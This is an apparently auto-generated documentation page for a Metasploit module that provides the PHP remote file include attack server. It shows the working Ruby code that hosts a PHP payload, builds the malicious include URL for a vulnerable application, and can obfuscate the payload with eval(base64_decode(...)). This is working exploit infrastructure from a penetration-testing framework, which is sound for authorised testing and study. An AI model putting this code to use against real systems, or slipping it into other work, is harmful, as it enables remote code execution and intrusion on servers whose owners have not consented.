Module: Msf::Exploit::Remote::HttpServer::PHPInclude

Includes:
Msf::Exploit::Remote::HttpServer
Defined in:
lib/msf/core/exploit/remote/http_server/php_include.rb

Overview

This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary collapse

Methods included from Msf::Exploit::Remote::HttpServer

#add_resource, #add_robots_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string

Instance Method Details

#autofilterObject

Since these types of vulns are Stance::Aggressive, override HttpServer’s normal non-automatic behaviour and allow things to run us automatically



28
29
30
# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 28

def autofilter
  true
end

#exploitObject

:category: Exploit::Remote::TcpServer overrides

Override exploit() to handle service start/stop

Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:

  1. https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems

  2. somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server



45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 45

def exploit
  old_ssl = datastore["SSL"]
  datastore["SSL"] = false
  start_service
  datastore["SSL"] = old_ssl

  #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
  #	print_error("Warning: the URL used for the include might be wrong!")
  #	print_error("If the target system can route to #{srvhost_addr} it")
  #	print_error("is safe to ignore this warning. If not, try using a")
  #	print_error("reverse payload instead of bind.")
  #end

  print_status("PHP include server started.");
  php_exploit
  ::IO.select(nil, nil, nil, 5)
end

#initialize(info = {}) ⇒ Object



14
15
16
17
18
19
20
21
22
23
24
# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 14

def initialize(info = {})

  # Override TCPServer's stance of passive
  super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

  register_evasion_options(
    [
      OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
    ], Exploit::Remote::HttpServer::PHPInclude
  )
end

#on_request_uri(cli, request, headers = {}) ⇒ Object

:category: Event Handlers

Handle an incoming PHP code request



83
84
85
86
87
88
89
# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 83

def on_request_uri(cli, request, headers={})
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Send it to the application
  send_php_payload(cli, p.encoded, headers)
end

#php_include_url(sock = nil) ⇒ String

The PHP include URL (pre-encoded)

Does not take SSL into account. For the reasoning behind this, see #exploit.

Returns:

  • (String)

    The URL to be used as the argument in a call to require, require_once, or include or include_once in a vulnerable PHP app.



100
101
102
103
104
105
106
# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 100

def php_include_url(sock=nil)
  host = srvhost_addr
  if Rex::Socket.is_ipv6?(host)
    host = "[#{host}]"
  end
  "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end

#send_php_payload(cli, body, headers = {}) ⇒ Object

Transmits a PHP payload to the web application



66
67
68
69
70
71
72
73
74
75
76
# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 66

def send_php_payload(cli, body, headers = {})

  case datastore['PHP::Encode']
  when 'base64'
    body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
  when 'none'
    body = "<?php #{body} ?>"
  end

  send_response(cli, body, headers)
end